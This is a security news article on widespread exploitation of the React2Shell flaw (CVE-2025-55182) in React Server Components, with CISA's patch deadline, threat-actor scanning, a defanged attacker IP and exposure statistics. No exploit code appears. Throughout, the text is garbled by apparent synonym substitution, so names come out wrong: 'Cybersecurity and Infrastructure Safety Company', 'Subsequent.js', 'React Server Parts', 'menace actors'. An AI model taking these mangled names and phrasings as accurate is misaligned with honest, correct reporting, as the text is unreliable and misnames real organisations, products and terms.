The U.S. Cybersecurity and Infrastructure Safety Company (CISA) has urged federal businesses to patch the latest React2Shell vulnerability by December 12, 2025, amid stories of widespread exploitation.
The essential vulnerability, tracked as CVE-2025-55182 (CVSS rating: 10.0), impacts the React Server Parts (RSC) Flight protocol. The underlying explanation for the difficulty is an unsafe deserialization that enables an attacker to inject malicious logic that the server executes in a privileged context. It additionally impacts different frameworks, together with Subsequent.js, Waku, Vite, React Router, and RedwoodSDK.
“A single, specifically crafted HTTP request is adequate; there isn’t a authentication requirement, consumer interplay, or elevated permissions concerned,” Cloudforce One, Cloudflare’s menace intelligence workforce, stated. “As soon as profitable, the attacker can execute arbitrary, privileged JavaScript on the affected server.”
Since its public disclosure on December 3, 2025, the shortcoming has been exploited by a number of menace actors in numerous campaigns to interact in reconnaissance efforts and ship a variety of malware households.
The event prompted CISA so as to add it to its Recognized Exploited Vulnerabilities catalog final Friday, giving federal businesses till December 26 to use the fixes. The deadline has since been revised to December 12, 2025, a sign of the severity of the incident.
Cloud security firm Wiz stated it has noticed a “speedy wave of opportunistic exploitation” of the flaw, with a overwhelming majority of the assaults focusing on internet-facing Subsequent.js functions and different containerized workloads operating in Kubernetes and managed cloud companies.
 |
| Picture Supply: Cloudflare |
Cloudflare, which can be monitoring ongoing exploitation exercise, stated menace actors have carried out searches utilizing internet-wide scanning and asset discovery platforms to seek out uncovered programs operating React and Subsequent.js functions. Notably, a few of the reconnaissance efforts have excluded Chinese language IP handle areas from their searches.
“Their highest-density probing occurred towards networks in Taiwan, Xinjiang Uyghur, Vietnam, Japan, and New Zealand – areas incessantly related to geopolitical intelligence assortment priorities,” the net infrastructure firm stated.
The noticed exercise can be stated to have focused, albeit extra selectively, authorities (.gov) web sites, tutorial analysis establishments, and significant‑infrastructure operators. This included a nationwide authority chargeable for the import and export of uranium, uncommon metals, and nuclear gasoline.
A few of the different notable findings are listed under –
- Prioritizing excessive‑sensitivity know-how targets resembling enterprise password managers and safe‑vault companies, possible with the purpose of perpetrating provide chain assaults
- Concentrating on edge‑going through SSL VPN home equipment whose administrative interfaces could incorporate React-based elements
- Early scanning and exploitation makes an attempt originated from IP addresses beforehand related to Asia-affiliated menace clusters
In its personal evaluation of honeypot knowledge, Kaspersky stated it recorded over 35,000 exploitation makes an attempt on a single day on December 10, 2025, with the attackers first probing the system by operating instructions like whoami, earlier than dropping cryptocurrency miners or botnet malware households like Mirai/Gafgyt variants and RondoDox.
Safety researcher Rakesh Krishnan has additionally found an open listing hosted on “154.61.77[.]105:8082” that features a proof-of-concept (PoC) exploit script for CVE-2025–55182 together with two different information –
- “domains.txt,” which incorporates an inventory of 35,423 domains
- “next_target.txt,” which incorporates an inventory of 596 URLs, together with firms like Dia Browser, Starbucks, Porsche, and Lululemon
It has been assessed that the unidentified menace actor is actively scanning the web primarily based on targets added to the second file, infecting a whole lot of pages within the course of.
In accordance with the most recent knowledge from The Shadowserver Basis, there are greater than 137,200 internet-exposed IP addresses operating susceptible code as of December 11, 2025. Of those, over 88,900 cases are positioned within the U.S., adopted by Germany (10,900), France (5,500), and India (3,600).
